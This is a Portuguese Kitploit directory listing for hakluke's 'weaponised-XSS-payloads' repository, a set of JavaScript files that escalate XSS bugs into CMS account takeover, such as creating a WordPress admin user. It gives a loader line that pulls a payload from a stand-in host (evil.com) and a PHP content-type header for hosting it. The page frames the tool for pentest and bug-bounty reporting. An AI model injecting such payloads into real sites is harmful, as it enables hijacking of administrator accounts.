Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
weaponised-XSS-payloads — XSS payloads designed to turn alert(1) into P1 | Kitploit
Ferramentas/GitHubGitHub/hakluke/weaponised-xss-payloads
Payload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubhakluke/weaponised-xss-payloads

weaponised-XSS-payloads

XSS payloads designed to turn alert(1) into P1

Ver Repositório
1.4k222há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Payloads XSS Armamentados

Payloads XSS projetados para transformar alert(1) em P1.

O Post do Blog

Este repositório foi lançado juntamente com um post do blog intitulado "How to Upgrade Your XSS Bugs from Medium to Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

O que é isso?

Neste repositório você encontrará vários arquivos JavaScript que podem ser carregados em um payload de XSS para executar funções sensíveis em plataformas CMS populares no contexto do navegador da vítima. Isso pode ajudar a transformar um simples bug de XSS em algo mais crítico, como uma tomada de conta (account takeover).

Isso é perfeito para aumentar a severidade de um relatório de pentest ou bug bounty ao demonstrar um impacto de segurança real.

Os payloads estão sendo adicionados gradualmente, conforme tenho tempo. Muitos outros virão; se você puder ajudar, pull requests são bem-vindos! Se você está procurando inspiração sobre o que criar, verifique a aba "issues" neste repositório.

Como Usar

A maneira mais simples de usar esses payloads é hospedá-los em algum lugar e carregá-los no atributo src de uma tag script do seu payload de XSS, assim:

root@kitploit:~
<script src="http://evil.com/wordpress_create_admin_user.js"></script>

Alternativamente, dependendo do contexto e do tamanho do payload, às vezes ele pode ser minificado, codificado e então incluído diretamente na requisição.

Para hospedar o arquivo JavaScript, talvez seja necessário definir o Content-Type como application/javascript. Para conseguir isso com PHP, basta adicionar esta linha ao topo de qualquer um dos payloads, salvá-lo como um arquivo .php e hospedá-lo no seu servidor web com PHP:

root@kitploit:~
<?php header("Content-Type: application/javascript"); ?>

Créditos

Este artigo da Shift8 foi o que me inspirou a criar este repositório. O JS no artigo tem alguns pequenos erros de digitação, mas os conceitos estão corretos.

Baixar ferramenta